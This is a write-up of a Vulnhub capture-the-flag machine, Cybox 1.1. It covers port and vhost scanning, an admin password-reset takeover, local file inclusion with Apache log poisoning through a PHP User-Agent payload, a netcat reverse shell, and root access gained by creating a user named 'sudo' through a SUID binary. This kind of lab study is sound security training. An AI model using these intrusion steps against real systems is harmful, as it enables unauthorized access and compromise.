Vulnhub - Cybox 1.1 write up
6 min read

Vulnhub - Cybox 1.1 write up

Vulnhub - Cybox 1.1 write up


Will you be able to compromise the internal server of the CYBOX company?

Difficulty: Medium
Objective: Get user.txt and root.txt

This works better with VirtualBox rather than VMware.
Contact: @takito1812


Let's scan our network to find the IP of the box.

$ sudo netdiscover

 Currently scanning:   |   Screen View: Unique Hosts                                                                
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 264                                                                    
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------                                                         08:00:27:e2:7c:c9      1      60  PCS Systemtechnik GmbH                                                           

Ports scan :

$ nmap -p -1024 -T4 -oN scan.nmap

21/tcp  open  ftp
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
143/tcp open  imap
443/tcp open  https

There are many open ports, ftp, mail (SMTP & POP3), web (HTTP & HTTPS).


I try to do an anonymous login on the FTP but it doesn't work.


Nothing interesting on this static webpage apart from the admin email that give us a valid username and the domain (

The HTTPS certificate confirms the validity of the admin email address.

/C=US/ST=New York/L=New York City/O=Cybox Company/OU=Cybox/

gobuster was running in the background to find some new endpoints.

$ /opt/gobuster dir -w /opt/directory-list-lowercase-2.3-medium.txt -x php,txt,html -t 30 --url -q -o gobuster.dir

/index.html           (Status: 200) [Size: 8514]
/assets               (Status: 301) [Size: 237] [-->]
/phpmyadmin           (Status: 403) [Size: 92]

The /phpmyadmin returns :

For security reasons, this URL is only accesible using localhost ( as the hostname

I try to change my Host HTTP header but it does not work.

$ curl -H "Host: localhost"
For security reasons, this URL is only accesible using localhost ( as the hostname

$ curl -H "Host:"
For security reasons, this URL is only accesible using localhost ( as the hostname

So, I try to bruteforce the VHOST, maybe we can find some new web applications.

$ /opt/gobuster vhost -w /opt/directory-list-lowercase-2.3-medium.txt -t 30 --url -q -o vhost.dir

Found: (Status: 200) [Size: 1252]
Found: (Status: 200) [Size: 209]      
Found: (Status: 302) [Size: 0]    
Found: (Status: 302) [Size: 0]    
Found: (Status: 200) [Size: 5295] 

Add it to the /etc/hosts file.

$ cat /etc/hosts

Yes, there are many apps ! Let's create a user on the register app.

user: toto

Now, we can log in into the webmail and the monitor app. We have no mail and the monitor has no content. Let's try to reset our password.

Let's check our emails.

Ok now, what if we change the reset link.


Yes ! We can reset the admin password on the monitor app ! We now have access to a new admin panel.

After looking at the source code of the page, we can find this :

<link href="styles.php?style=general" type="text/css" rel="stylesheet">

Maybe we can do a LFI (Local File Inclusion) on the style parameter. After some URL guessing we can find a css file at /admin/styles/general.css.

After some quick try, we can confirm the LFI.


So know let's try to load logs file, after some bruteforcing we can find the apache access log from the app at /opt/bitnami/apache2/logs/access_log.
By making HTTP request to the FTP app we can control the content of the access_log file, so we can inject PHP code in it.

$ curl "" -A "<?php echo "toto"; ?>"
-A : User-Agent
Go to

... - - [03/Jan/2021:21:55:55 +0100] "GET /index.php HTTP/1.1" 200 5295 "-" "toto"

The PHP code is executed ! After trying to make a reverse shell, the cybox machine can't reach our box, some firewall rules I guess. So, I create a reverse shell on port 80 and it works !

$ nc -lvnp 80
Connection from
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
python: /opt/bitnami/common/lib/ no version information available (required by python)
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)


We have our first shell ! Let's find the user.txt flag !

daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd
bash: cd: HOME not set
daemon@cybox:/opt/bitnami/apache2/htdocs/monitor/admin$ cd /home
daemon@cybox:/home$ ls
admin  cybox  toto
daemon@cybox:/home$ cd cybox
daemon@cybox:/home/cybox$ ls 
daemon@cybox:/home/cybox$ cat user.txt


We can change our user to toto:toto that we have previously created on the register app (it's not required to root the box).

After some enumeration we can find a weird SUID binary at /opt/registerlauncher. It's an ELF that create the differents user on the box from the register app (like our user toto). It takes one parameter, the name of the user to create.

I try to find some vulnerabilities associate to the ELF but no result.

So, I ask a question to myself, what user can we create to gain privileges ? Remember from the beginning, I create a user toto and his password was toto too. So, I try to run the script with root as parameter, maybe this will replace the root password to root. But I get "user already exists". RIP

After some research, my friend W00dy find that, if you create a user named sudo we can execute all the commands with sudo by providing the password sudo.

toto@cybox:/tmp$ /opt/registerlauncher sudo has been created successfully. The credentials are sudo:sudo. You should change your default password for security.
toto@cybox:/tmp$ su sudo
Password: sudo

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

sudo@cybox:/tmp$ sudo -l
[sudo] password for sudo: sudo

Matching Defaults entries for sudo on cybox:
    env_reset, mail_badpass,

User sudo may run the following commands on cybox:
    (ALL : ALL) ALL
sudo@cybox:/tmp$ sudo su
root@cybox:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

We are root !

root@cybox:/tmp# cat /etc/sudoers    
# Allow members of group sudo to execute any command
root@cybox:/tmp# cat /root/root.txt

The user sudo was in the /etc/sudoers file.
Root flag !

Enjoying these posts? Subscribe for more